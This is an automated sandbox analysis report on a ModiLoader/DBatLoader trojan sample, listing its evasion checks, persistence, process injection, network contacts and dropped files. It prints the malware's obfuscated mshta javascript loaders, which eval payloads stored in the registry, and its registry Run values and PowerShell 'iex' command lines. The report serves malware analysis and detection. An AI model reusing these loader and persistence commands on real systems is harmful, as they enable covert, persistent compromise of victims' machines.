Malware Analysis Report

2024-10-19 07:03

Sample ID 240508-jvvw6aae4t
Target 23e8c853177ad64150596de9fb375e62_JaffaCakes118
SHA256 278ca4a6c160148619355f407877cdcc6dc49243e9bf14e97556051341fd5a65
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

278ca4a6c160148619355f407877cdcc6dc49243e9bf14e97556051341fd5a65

Threat Level: Known bad

The file 23e8c853177ad64150596de9fb375e62_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox drivers on disk

Looks for VMWare Tools registry key

Drops startup file

Checks computer location settings

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 07:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 07:59

Reported

2024-05-08 08:02

Platform

win7-20240221-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (59 identical rows)

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:oKCa20aI=\"po\";yl0=new%20ActiveXObject(\"WScript.Shell\");dVbi6G=\"Lvq\";Kq04fk=yl0.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");oje9BgS4=\"QbU5W4F\";eval(Kq04fk);FR9j4tB=\"7jaFN9t\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d71742\\cc24ba.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:psWz1J=\"nXqsLcKd\";Z8j=new%20ActiveXObject(\"WScript.Shell\");aZT14l=\"P6F2\";c6Wz3A=Z8j.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ruqqchx\\\\uiksnqah\");PigX88JRU=\"LBIXdJ0\";eval(c6Wz3A);ZybZkP1m=\"753d\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:qGc7W0G=\"dI5\";J6t=new ActiveXObject(\"WScript.Shell\");HfzDEM2K=\"ei\";nZk7f=J6t.RegRead(\"HKCU\\\\software\\\\ruqqchx\\\\uiksnqah\");r35jBM=\"f2d\";eval(nZk7f);rw9HKK8sq=\"jWbc9g\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.c56af49\ = "49de3d" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\49de3d C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A (63 identical rows)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe (11 identical rows)
PID 2808 wrote to memory of 2632 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (4 identical rows)
PID 2632 wrote to memory of 2568 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)
PID 2568 wrote to memory of 1100 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:TKM2qUa0E="4";v9b2=new%20ActiveXObject("WScript.Shell");c8L4gwjh="z0iiQ03C";M30qJj=v9b2.RegRead("HKLM\\software\\Wow6432Node\\EJDuoXwFIl\\k1xBXm");mSQyg2U="0OWY";eval(M30qJj);KV6biq6="OUhizJ";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:spdjc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
GB 25.175.128.53:80 tcp
US 143.229.189.151:80 tcp
US 69.34.28.18:8080 tcp
IE 160.6.100.23:80 tcp
US 24.93.254.247:80 tcp
US 54.112.101.43:80 tcp
PH 155.137.107.141:80 tcp
US 71.23.204.15:80 tcp
NO 84.210.103.160:80 tcp
KR 39.118.1.218:80 tcp
CN 120.47.251.48:80 tcp
NO 62.92.232.240:80 tcp
IT 145.14.174.66:80 tcp
FR 129.104.38.123:80 tcp
SD 197.251.69.232:80 tcp
US 40.207.212.228:80 tcp
US 166.132.127.167:80 tcp
US 173.116.248.157:80 tcp
AR 200.45.230.115:80 tcp
BR 191.255.126.3:80 tcp
SE 84.8.207.162:80 tcp
JP 61.205.243.214:80 tcp
BR 186.212.176.247:80 tcp
ZA 196.46.231.92:80 tcp
PL 93.89.197.154:80 tcp
NL 62.41.28.196:80 tcp
GB 213.52.241.175:80 tcp
US 153.48.249.41:80 tcp
CN 219.239.94.87:80 tcp
CN 112.128.20.164:80 tcp
IE 82.198.136.47:80 tcp
DE 62.96.25.95:80 tcp
US 40.195.167.177:80 tcp
US 24.171.85.1:8080 tcp
US 206.121.173.97:80 tcp
KR 61.83.244.202:80 tcp
US 75.139.209.231:80 tcp
HK 202.64.46.114:80 tcp
CA 66.131.164.118:80 tcp
N/A 127.110.167.222:80 tcp
EG 62.140.66.163:80 tcp
US 4.1.27.100:80 tcp
US 20.188.82.230:80 tcp
ID 117.54.17.44:80 tcp
IL 132.78.52.232:80 tcp
US 143.83.254.72:8080 tcp
NL 145.198.135.80:80 tcp
CN 110.16.181.248:80 tcp
KR 110.68.50.51:80 tcp
DE 134.147.10.45:80 tcp
US 209.54.91.162:80 tcp
SE 195.17.117.73:80 tcp
GB 31.125.87.100:80 tcp
GB 172.167.69.11:80 tcp
DE 138.246.228.68:80 tcp
US 30.39.243.214:80 tcp
CN 219.247.86.83:80 tcp
DE 85.205.169.109:80 tcp
CN 103.75.144.181:443 tcp
AR 200.51.42.69:443 tcp
JP 221.55.106.217:80 tcp
US 137.39.202.244:80 tcp
US 56.51.138.77:80 tcp
IT 37.177.189.14:8080 tcp
NO 136.164.166.143:80 tcp
CA 142.15.180.239:80 tcp
BR 177.163.27.131:80 tcp
SG 47.88.181.75:80 tcp
TZ 41.59.238.138:443 tcp
US 57.119.120.231:80 tcp
IT 131.1.247.196:80 tcp
NO 86.62.166.161:8080 tcp
SA 37.42.222.157:80 tcp
FR 81.194.119.170:8080 tcp
IT 146.48.6.19:80 tcp
US 137.200.205.2:80 tcp
US 76.48.210.134:8080 tcp
BR 191.21.13.117:80 tcp
EG 156.170.132.248:8080 tcp
IT 31.217.206.239:80 tcp
GB 25.220.70.228:80 tcp
US 158.16.126.162:80 tcp
KR 115.95.95.25:8080 tcp
NL 145.75.8.187:80 tcp
US 143.185.10.182:80 tcp
CN 114.64.169.205:80 tcp
US 16.161.197.144:80 tcp
US 96.172.83.219:80 tcp
KR 123.36.134.213:443 tcp
US 6.115.54.95:80 tcp
JP 220.210.20.230:80 tcp
DZ 105.111.10.119:8080 tcp
SA 100.242.91.96:80 tcp
US 147.239.224.209:80 tcp
SE 144.63.255.255:80 tcp
EG 102.13.150.17:80 tcp
SE 212.32.141.21:80 tcp
GT 190.143.198.176:80 tcp
CN 49.6.174.191:80 tcp
US 29.72.57.71:443 tcp
CA 99.231.211.28:80 tcp
IT 79.31.48.99:80 tcp
HK 103.51.111.175:80 tcp
AT 5.44.211.21:80 tcp
US 215.176.81.255:80 tcp
US 23.131.48.187:80 tcp
US 107.227.164.247:8080 tcp
CN 182.36.169.185:8080 tcp
KR 163.255.207.186:80 tcp
CO 190.146.34.161:8080 tcp
US 28.186.70.19:80 tcp
KR 210.111.237.1:80 tcp
IT 88.48.83.105:80 tcp
ZA 155.232.144.233:80 tcp
NO 148.120.166.101:443 tcp
AR 186.142.218.112:80 tcp
CN 124.174.18.119:80 tcp
CH 57.8.13.136:80 tcp
US 34.177.56.149:80 tcp
GB 86.138.198.244:80 tcp
CN 60.167.81.31:80 tcp
CN 122.86.58.150:80 tcp
US 70.199.210.21:80 tcp
KR 42.42.156.136:80 tcp
US 56.116.18.107:80 tcp
BR 45.190.253.70:80 tcp
US 26.156.64.234:443 tcp
DE 91.50.35.62:80 tcp
CN 219.230.95.35:80 tcp
ID 202.162.216.102:80 tcp
US 172.8.202.109:80 tcp
CN 1.31.240.139:80 tcp
US 152.100.134.178:80 tcp
US 48.44.61.56:80 tcp
MX 187.135.87.141:80 tcp
SA 2.91.201.42:80 tcp
US 12.83.242.193:80 tcp
FR 77.84.179.254:80 tcp
US 143.18.64.220:8080 tcp

Files

memory/2100-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2100-8-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-10-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-11-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-9-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-6-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-7-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2100-12-0x00000000007A0000-0x0000000000876000-memory.dmp

memory/2632-22-0x0000000005CC0000-0x0000000005D96000-memory.dmp

memory/2632-26-0x0000000005CC0000-0x0000000005D96000-memory.dmp

memory/2568-24-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-23-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-32-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-42-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-46-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-31-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-37-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-45-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-49-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-48-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-58-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-57-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-66-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-56-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-55-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-54-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-59-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-47-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-44-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-43-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-41-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-40-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-39-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-38-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-36-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-35-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-34-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-33-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-30-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/1100-67-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-81-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-80-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-78-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-77-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-76-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-74-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-72-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-70-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-79-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-75-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-73-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-71-0x0000000000210000-0x0000000000351000-memory.dmp

memory/1100-69-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2632-25-0x0000000002850000-0x0000000004850000-memory.dmp

memory/1100-68-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2568-29-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-28-0x00000000000D0000-0x0000000000211000-memory.dmp

memory/2568-27-0x00000000000D0000-0x0000000000211000-memory.dmp

C:\Users\Admin\AppData\Local\d71742\ee03f2.bat

MD5 251c82732dbd03982f565deed73bb4f2
SHA1 2f903f60f1946953494fb995438cc2419abe59df
SHA256 4b67bfb9575e3dffcba2ad2d0c3b194119b1671d0e079ca9a2ff85b177d438f2
SHA512 1c6d1dd21ef660f870e23663b8f895f2255bf43830e93690217124a6b4a8cc563f97a4db145dd247b93bda3d49b7ef9d2ddf4ce58c72eccfb4609a356afd1344

C:\Users\Admin\AppData\Roaming\3aef84\6d4792.c56af49

MD5 1678a6b94a5f263613210ff293666256
SHA1 1c4b21f5a3ff4d55b4153eca73cceee264ac390a
SHA256 a548781b97ee4f631a917c7b6187af2ce0b4976daa3b0df3893fe22d26c5cb16
SHA512 c420f2729ed2edfeeb6dd8567853b259d6f541367d8dc2bc4653ecd8da5979c5d81dd0e9ef1dfe8a07159ea7045b51564cf629aa0b7a72ec06c929f1817fc23b

C:\Users\Admin\AppData\Local\d71742\cc24ba.lnk

MD5 50eb0e8cdcb08fb593309add1f03ecc8
SHA1 5130a8324ab30e3cf18ec17abeb4e3b876b4f84c
SHA256 431f91eb9a44286c5c7c6ba9d1a561e0c667ce2b7ebcaf878da1df3717738385
SHA512 e3a643664158c2e016269f53df575c5697fff1f56458ab62e4f016ab227be74ab94bfad21d5644d5dba81cf9a26ebf8ed254a3011ec759446cdda6ed09806db7

C:\Users\Admin\AppData\Local\d71742\043bcc.c56af49

MD5 557e3797953cc87f31df72def303bb9c
SHA1 c480128e944764caa091ca882ab9546a7fe8599b
SHA256 e9621b68352320d5c569d1f2e946bb19267c333cbf5fbdf2abdeaf6a919919be
SHA512 50e5c65ddfc96a5fe7d8a9c4e7505efc0069a438b3e0e77e69a77d7975fb949388d6b688285ffdc63d35d709294fc1556adf3ab6030213924c476956e49d9dce

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk

MD5 86cd5086f5650df400c0fe2c92e267db
SHA1 499252b52603481b50260e789d18a16ac32f46e9
SHA256 b0d96d1cf0032b31e6a262a615e6b38d3b7ff195ea7134623a43a60f23ddba3a
SHA512 47ba3a960e33befa0e69343cb7cab413ec86fcad4d5961fb6f64737f7033a7ab2626fa360c313982a691f7bdeb3a5951e1747b7be175b9c54fa0e40566e3f7e4

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 07:59

Reported

2024-05-08 08:02

Platform

win10v2004-20240419-en

Max time kernel

142s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (10 identical rows)

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (2 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe (10 identical rows)
PID 3932 wrote to memory of 4560 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:reQWNkN1="YQDUB7oM";fb66=new%20ActiveXObject("WScript.Shell");sP7lg="8hxLb";Dq1i5b=fb66.RegRead("HKLM\\software\\Wow6432Node\\LWI7bIR\\WVHy6l6ay9");VMi7au2="hf";eval(Dq1i5b);ePHIH3="5NzeZHt";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:bojxj

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4388-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-6-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-10-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-9-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-8-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-7-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-11-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-12-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4560-14-0x0000000004C70000-0x0000000004CA6000-memory.dmp

memory/4560-15-0x00000000052E0000-0x0000000005908000-memory.dmp

memory/4560-16-0x0000000005260000-0x0000000005282000-memory.dmp

memory/4560-17-0x0000000005A40000-0x0000000005AA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4f1jmaps.3df.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4560-18-0x0000000005AB0000-0x0000000005B16000-memory.dmp

memory/4560-28-0x0000000005C50000-0x0000000005FA4000-memory.dmp

memory/4560-29-0x0000000005FF0000-0x000000000600E000-memory.dmp

memory/4560-30-0x0000000006030000-0x000000000607C000-memory.dmp

memory/4560-31-0x0000000007720000-0x0000000007D9A000-memory.dmp

memory/4560-32-0x00000000070C0000-0x00000000070DA000-memory.dmp